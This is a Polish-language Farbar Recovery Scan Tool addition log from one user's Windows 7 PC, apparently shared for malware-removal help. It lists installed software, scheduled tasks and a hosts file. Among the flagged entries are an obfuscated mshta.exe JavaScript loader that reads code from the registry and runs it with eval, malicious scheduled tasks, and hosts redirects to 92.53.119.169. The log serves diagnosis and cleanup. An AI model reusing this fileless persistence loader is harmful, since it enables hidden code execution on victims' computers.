Rezultaty skanu uzupełniającego Farbar Recovery Scan Tool (x64) Wersja: 10.02.2018 02 Uruchomiony przez Mateusz (11-02-2018 19:35:36) Uruchomiony z C:\Users\Mateusz\Desktop\Nowy folder Windows 7 Home Premium Service Pack 1 (X64) (2015-12-19 04:57:08) Tryb startu: Normal ========================================================== ==================== Konta użytkowników: ============================= Administrator (S-1-5-21-1759047646-105122766-3284860367-500 - Administrator - Disabled) Gość (S-1-5-21-1759047646-105122766-3284860367-501 - Limited - Disabled) Mateusz (S-1-5-21-1759047646-105122766-3284860367-1000 - Administrator - Enabled) => C:\Users\Mateusz ==================== Centrum zabezpieczeń ======================== (Załączenie wejścia w fixlist spowoduje jego usunięcie.) AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} ==================== Zainstalowane programy ====================== (W fixlist dozwolone tylko załączanie programów adware z flagą "Hidden" w celu ich uwidocznienia. Programy adware powinny zostać w poprawny sposób odinstalowane.) µTorrent (HKU\S-1-5-21-1759047646-105122766-3284860367-1000\...\uTorrent) (Version: 3.5.1.44332 - BitTorrent Inc.) Adobe Acrobat Reader DC - Polish (HKLM-x32\...\{AC76BA86-7AD7-1045-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated) Adobe Flash Player 28 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 28.0.0.161 - Adobe Systems Incorporated) Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated) Adobe Flash Player 28 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated) AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.) AVG (HKLM\...\{67975182-2130-493C-A58F-7C2604B8852A}) (Version: 1.191.1 - AVG Technologies) Hidden Bloody6 (HKLM-x32\...\Bloody3) (Version: 17.04.0003 - Bloody) Brother MFL-Pro Suite DCP-115C (HKLM-x32\...\{BB9AC6BF-71B6-42A4-9689-C17D9F44E79A}) (Version: 1.0.1.0 - Brother Industries, Ltd.) Catalyst Control Center Next Localization BR (HKLM\...\{D6823E97-B396-927D-D651-AFB82BE03523}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHS (HKLM\...\{4B01C6D5-4693-6CA8-ECF7-A0F9E7FEC6DB}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CHT (HKLM\...\{50DBC6DD-C2A2-2C38-FE37-A48208474155}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization CS (HKLM\...\{BF26ACAF-6D09-023B-5FB7-8A848874A724}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DA (HKLM\...\{9DB37D05-F855-5D7D-08C2-25E00E2CCDBC}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization DE (HKLM\...\{87250370-0A99-4ED9-DCE4-970DAC325FA5}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization EL (HKLM\...\{1F815C78-D31E-53FD-C8BF-3215E4F022A3}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization ES (HKLM\...\{79F58747-D616-4CDB-7D8B-4BC580D99153}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FI (HKLM\...\{02E80355-64BF-6C1E-B0B7-76857D62A86D}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization FR (HKLM\...\{77158555-E271-A561-ECDA-611639388B5C}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization HU (HKLM\...\{97673BD1-8CA0-53EF-C4E7-282CD8748F1C}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization IT (HKLM\...\{F1AD64B3-4114-8EF7-407C-F9F9122EDA68}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization JA (HKLM\...\{ED28D75F-557C-39C9-5004-F8F17C8BC279}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization KO (HKLM\...\{41268A73-D680-48C5-DE5E-CF67C05CBBBB}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NL (HKLM\...\{9655DE76-0987-9159-5A7E-FCE18409D004}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization NO (HKLM\...\{CD73EC8B-9F04-5EA1-8FD4-AEE4DAC51267}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization PL (HKLM\...\{397C2EE5-B514-0CC5-53C3-2FBE46CE6EDF}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization RU (HKLM\...\{45FA39D2-8AEB-AFF8-2FA6-96891732CB80}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization SV (HKLM\...\{B3EA6CCB-F44C-DC35-94F5-1B9CC18FE598}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TH (HKLM\...\{AEE4C0AE-CDAF-5D37-2DA3-A2B3FDFE6E81}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden Catalyst Control Center Next Localization TR (HKLM\...\{BE064737-1F2C-ECDD-916C-798E3D18C263}) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.) Hidden CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform) Comp Pool (HKU\S-1-5-21-1759047646-105122766-3284860367-1000\...\{AC2597A6-934A-8F8D-607C-D4DAE4CBC9FE}) (Version: 1.8.4 - Virtual Kingdom corp) <==== UWAGA Epic Games Launcher (HKLM-x32\...\{E464CC10-0D7A-4C7A-9EE0-BA2474E19F29}) (Version: 1.1.123.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden FACEIT 0.14.0 (HKLM\...\1b460c18-2611-5297-a1a8-4f35160a268c) (Version: 0.14.0 - FACEIT Ltd.) FACEIT Client version 1.0 (HKLM\...\{1419E44C-0EF4-4822-9194-9F1A4D43973D}_is1) (Version: 1.0 - FACEIT LTD) FMW 1 (HKLM\...\{AF4C2E26-9BE2-4813-B1A4-9CA0717374D3}) (Version: 1.203.1 - AVG Technologies) Hidden GIGABYTE OC_GURU II (HKLM-x32\...\{5588D686-D23B-4C9D-BDFA-2A7875CD3722}) (Version: 1.55.0000 - GIGABYTE Technology Co.,Ltd.) Hidden GIGABYTE OC_GURU II (HKLM-x32\...\InstallShield_{5588D686-D23B-4C9D-BDFA-2A7875CD3722}) (Version: 1.55.0000 - GIGABYTE Technology Co.,Ltd.) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 63.0.3239.132 - Google Inc.) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.15.1730 - Intel Corporation) Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2884 - Intel Corporation) Intel(R) Processor Identification Utility (HKLM-x32\...\{A92A4DB0-CD37-42D1-BE1D-603D53C24328}) (Version: 1.0.0.0 - Intel Corporation) Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation) Java 8 Update 161 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180161F0}) (Version: 8.0.1610.12 - Oracle Corporation) Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Microsoft .NET Framework 4.6.2 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01590 - Microsoft Corporation) Microsoft Office Word 2007 (HKLM-x32\...\WORD) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{02A39130-2CF3-30CA-8623-30F6071A4221}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation) Microsoft Word (HKLM-x32\...\Microsoft Word2007) (Version: 2007 - Ringier Axel Springer Polska Sp. z o.o.) Mozilla Firefox 58.0.2 (x64 pl) (HKLM\...\Mozilla Firefox 58.0.2 (x64 pl)) (Version: 58.0.2 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 58.0.2 - Mozilla) Opera Stable 50.0.2762.67 (HKLM-x32\...\Opera 50.0.2762.67) (Version: 50.0.2762.67 - Opera Software) ParentalControl(x86) (HKU\.DEFAULT\...\ParentalControl) (Version: - ) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.77.1126.2013 - Realtek) Realtek Ethernet Diagnostic Utility (HKLM-x32\...\{DADC7AB0-E554-4705-9F6A-83EA82ED708E}) (Version: 2.0.2.7 - Realtek) Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7071 - Realtek Semiconductor Corp.) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) SteelSeries Engine 3.11.11 (HKLM\...\SteelSeries Engine 3) (Version: 3.11.11 - SteelSeries ApS) TeamSpeak 3 Client (HKU\S-1-5-21-1759047646-105122766-3284860367-1000\...\TeamSpeak 3 Client) (Version: 3.0.18.2 - TeamSpeak Systems GmbH) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) Windows 7 USB/DVD Download Tool (HKLM-x32\...\{CCF298AF-9CE1-4B26-B251-486E98A34789}) (Version: 1.0.30 - Microsoft Corporation) WinRAR 5.31 (32-bitowy) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH) ==================== Niestandardowe rejestracje CLSID (filtrowane): ========================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) CustomCLSID: HKU\S-1-5-21-1759047646-105122766-3284860367-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1759047646-105122766-3284860367-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1759047646-105122766-3284860367-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1759047646-105122766-3284860367-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1759047646-105122766-3284860367-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1759047646-105122766-3284860367-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation) HKU\.DEFAULT\Software\Classes\24c67: "C:\Windows\system32\mshta.exe" "javascript:OQW5V8d="KINC8C";sd4=new ActiveXObject("WScript.Shell");zn82MSeY="s456";U1mfQ=sd4.RegRead("HKCU\\software\\xdlnnbhy\\pwis");jc46amn="z6ZQHDF1";eval(U1mfQ);sDjsY81="8wIDm";" <==== UWAGA ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1: [AVG] -> [CC]{472083B1-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-04-24] (Advanced Micro Devices, Inc.) ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2012-11-12] (Intel Corporation) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2016-02-08] (Alexander Roshal) ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2016-02-08] (Alexander Roshal) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {052344CC-5F15-494C-AC3C-63703D1F56A6} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe Task: {090E51E9-DE77-46C4-B863-E7AA85EFCC13} - System32\Tasks\Neaij => C:\PROGRA~1\GROOVE~1\Urugn.bat <==== UWAGA Task: {0CD17A37-5612-4AB8-AF05-51FAB73636C9} - System32\Tasks\FACEIT Client => C:\Program Files\FACEIT Client\faceitclient.exe [2018-02-07] () Task: {201010CF-7892-45FB-9318-06C99B3843E0} - System32\Tasks\{6CC7AE75-1F51-4A29-B5D6-915D820D259A} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Flexflex\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\Flexflex\uninstall.dat" -a uninstallme 26BACF29-13DA-4C96-9D39-DC28055FAD39 DeviceId=7c2e72e5-4ab7-7370-dd06-78cffe1b09eb BarcodeId=50036003 ChannelId=3 DistributerName=APSFCovus Task: {22707340-77A8-42EC-B11B-FA3EA2A674E8} - System32\Tasks\Comp Pool2 => C:\Windows\system32\rundll32.exe "C:\Users\Mateusz\AppData\Local\Comp Pool\{15460D1F-D559-48C7-F89C-E41222776F91}\ifhokjm.dll",#1 <==== UWAGA Task: {2A16F7C8-3510-40E5-AB45-1EE68699C63D} - System32\Tasks\{4D73C0C0-24C3-4D4A-8B20-FEE6686973C6} => C:\Windows\system32\pcalua.exe -a C:\Users\Mateusz\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face Task: {2B8B33C9-C47A-4B13-ADFF-936B995F3471} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-06-10] (Google Inc.) Task: {2E0E05E2-3A5F-474D-A899-6FA9CA8F028E} - System32\Tasks\{1E479D74-5C87-4F3B-A76E-602FE99B3825} => C:\Windows\system32\pcalua.exe -a E:\setup.exe -d E:\ Task: {322DE7E1-D2EE-4866-9273-D4682BDED373} - System32\Tasks\{D4C5F05F-5983-4FF7-A6DE-91C53DBD469B} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Common Files\Flexflex\uninstall.exe" -c -f "C:\Program Files (x86)\Common Files\Flexflex\uninstall.dat" -a uninstallme 26BACF29-13DA-4C96-9D39-DC28055FAD39 DeviceId=7c2e72e5-4ab7-7370-dd06-78cffe1b09eb BarcodeId=50036003 ChannelId=3 DistributerName=APSFCovus Task: {34E247B8-4E85-4451-8483-E798F5CB999C} - System32\Tasks\{765DC2F4-E78A-4586-87D3-ECD1397A01BE} => C:\Windows\system32\pcalua.exe -a E:\setup.exe -d E:\ Task: {37152CA4-A3C8-449D-BDB5-5842E287D4CE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated) Task: {45F453F4-5949-4205-A6ED-66DB68A5A5A5} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-02-11] (Adobe Systems Incorporated) Task: {510D25F7-3DE7-4129-B956-4FBC4EF3C673} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe Task: {55B74A69-DA09-43F4-88FE-C3FF3C54A4D9} - System32\Tasks\Cizutain Monitor => C:\Program Files (x86)\Porikgerceent\ghugther.exe Task: {687AB33B-A3BF-4CD8-BC13-FEF03F6FFB3D} - System32\Tasks\{97D07746-D72F-46B9-8476-3B1D7515E414} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\mpck\uninstaller.exe" Task: {86A2457F-662C-42D6-ADA4-1BD7B7512630} - System32\Tasks\Opera scheduled Autoupdate 1498561377 => C:\Program Files\Opera\launcher.exe [2018-01-22] (Opera Software) Task: {A66EFE03-5184-4FB0-BEFA-BADE13C94DB1} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_28_0_0_161_pepper.exe [2018-02-11] (Adobe Systems Incorporated) Task: {A6B9A418-C4CA-42E8-BCCC-BDD037F9F3B0} - System32\Tasks\{6EF9EC59-F759-44AB-B659-806D3BC869F9} => C:\Windows\system32\pcalua.exe -a "C:\Users\Mateusz\Downloads\Pro Evolution Soccer 2017.RePack\Redist\directx.exe" -d "C:\Users\Mateusz\Downloads\Pro Evolution Soccer 2017.RePack\Redist" Task: {CAD7505F-816F-494C-947A-AD4717B667A7} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2015-11-16] (Piriform Ltd) Task: {D3B45A62-CCDD-4866-ACFC-AEBA76155F2E} - System32\Tasks\Vunersharaqeent Mapper => C:\Program Files (x86)\Phodelefufasp\reinik.exe Task: {D91E307C-60DD-4994-9631-2B85F6F55344} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-06-10] (Google Inc.) Task: {EABC7F07-392F-429F-BCC8-F5E36F54DA3A} - System32\Tasks\{EA7655C4-EECF-4E94-977D-B26A75A98EDD} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\IgrzyskaZimowePL\unins000.exe" Task: {F005A435-757B-4CFF-BFAE-DF6914AF97EF} - System32\Tasks\Drovatystqasp Module => C:\Program Files (x86)\Anisat\notasp.exe Task: {FE172495-8589-435B-B9BC-81CA52A9EC93} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-04-24] (Advanced Micro Devices, Inc.) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ShortcutWithArgument: C:\Users\Mateusz\Desktop\Boonsi - Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 5" ShortcutWithArgument: C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\ff13ca23fee04978\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 5" ShortcutWithArgument: C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\9501e18d7c2ab92e\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 2" ShortcutWithArgument: C:\Users\Mateusz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\48499db33039e897\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory="Profile 4" ==================== Załadowane moduły (filtrowane) ============== 2016-09-14 02:00 - 2016-09-14 02:00 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll 2016-09-14 02:00 - 2016-09-14 02:00 - 000739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll 2016-09-14 02:00 - 2016-09-14 02:00 - 000014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll 2016-09-14 02:00 - 2016-09-14 02:00 - 000071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll 2016-09-14 01:59 - 2016-09-14 01:59 - 000011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll 2016-09-14 01:59 - 2016-09-14 01:59 - 002013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll 2016-09-14 02:00 - 2016-09-14 02:00 - 000191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll 2015-11-16 17:55 - 2015-11-16 17:55 - 000061440 _____ () C:\Program Files\CCleaner\lang\lang-1045.dll 2018-01-09 15:41 - 2018-01-03 10:20 - 004063064 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libglesv2.dll 2018-01-09 15:41 - 2018-01-03 10:20 - 000099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\63.0.3239.132\libegl.dll 2017-04-25 02:36 - 2017-04-25 02:36 - 000356744 _____ () C:\Windows\SysWOW64\GameManager32.dll 2015-12-20 01:19 - 2017-11-29 06:09 - 000781088 _____ () C:\Steam\SDL2.dll 2015-12-20 01:19 - 2016-09-01 02:02 - 004969248 _____ () C:\Steam\v8.dll 2015-12-20 01:19 - 2016-09-01 02:02 - 001563936 _____ () C:\Steam\icui18n.dll 2015-12-20 01:19 - 2016-09-01 02:02 - 001195296 _____ () C:\Steam\icuuc.dll 2015-12-20 01:19 - 2017-12-15 20:59 - 002558752 _____ () C:\Steam\video.dll 2017-12-14 14:52 - 2017-11-04 02:54 - 005137696 _____ () C:\Steam\libavcodec-57.dll 2017-12-14 14:52 - 2017-11-04 02:54 - 000847136 _____ () C:\Steam\libavutil-55.dll 2017-12-14 14:52 - 2017-11-04 02:54 - 000695584 _____ () C:\Steam\libavformat-57.dll 2017-12-14 14:52 - 2017-11-04 02:54 - 000351520 _____ () C:\Steam\libavresample-3.dll 2017-12-14 14:52 - 2017-11-04 02:54 - 000783648 _____ () C:\Steam\libswscale-4.dll 2015-12-20 01:19 - 2017-12-15 20:59 - 000904992 _____ () C:\Steam\bin\chromehtml.DLL 2016-03-11 12:37 - 2016-07-04 23:17 - 000266560 _____ () C:\Steam\openvr_api.dll 2017-06-08 10:17 - 2017-09-07 03:04 - 000678400 _____ () C:\Steam\bin\cef\cef.win7\SDL2.dll 2016-12-12 21:14 - 2017-10-31 05:44 - 071471904 _____ () C:\Steam\bin\cef\cef.win7\libcef.dll 2015-12-20 01:19 - 2015-09-25 00:52 - 000119208 _____ () C:\Steam\winh264.dll 2015-12-19 06:13 - 2013-09-16 13:17 - 001242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\TEMP:6BE50C2B [464] AlternateDataStreams: C:\Users\Public\AppData:CSM [480] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver" ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2009-07-14 03:34 - 2017-04-29 10:43 - 000007643 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com 127.0.0.1 union.baidu2019.com 127.0.0.1 down.baidu2016.com 127.0.0.1 123.sogou.com 127.0.0.1 www.czzsyzgm.com 127.0.0.1 www.czzsyzxl.com 127.0.0.1 union.baidu2019.com 92.53.119.169 469ba60d9681f961064c-3cca6631dac1b4997db921c060b712f6.r30.cf2.rackcdn.com 92.53.119.169 a.bf-ad.net 92.53.119.169 a.visualrevenue.com 92.53.119.169 a1.vdna-assets.com 92.53.119.169 a248.e.akamai.net 92.53.119.169 aax.amazon-adsystem.com 92.53.119.169 ad.crwdcntrl.net 92.53.119.169 ad.mail.ru 92.53.119.169 ade.clmbtech.com 92.53.119.169 ads.adfox.ru 92.53.119.169 ads.pubmatic.com 92.53.119.169 apis.google.com 92.53.119.169 asset.pagefair.net 92.53.119.169 assets.adobedtm.com 92.53.119.169 assets.flocktory.com 92.53.119.169 autocontext.begun.ru 92.53.119.169 b.grvcdn.com 92.53.119.169 b.ns1p.net 92.53.119.169 b.scorecardresearch.com 92.53.119.169 b.wal.co Wykryto więcej niż wyliczono: 130 linii. ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-1759047646-105122766-3284860367-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Mateusz\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 62.179.1.62 - 62.179.1.63 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => 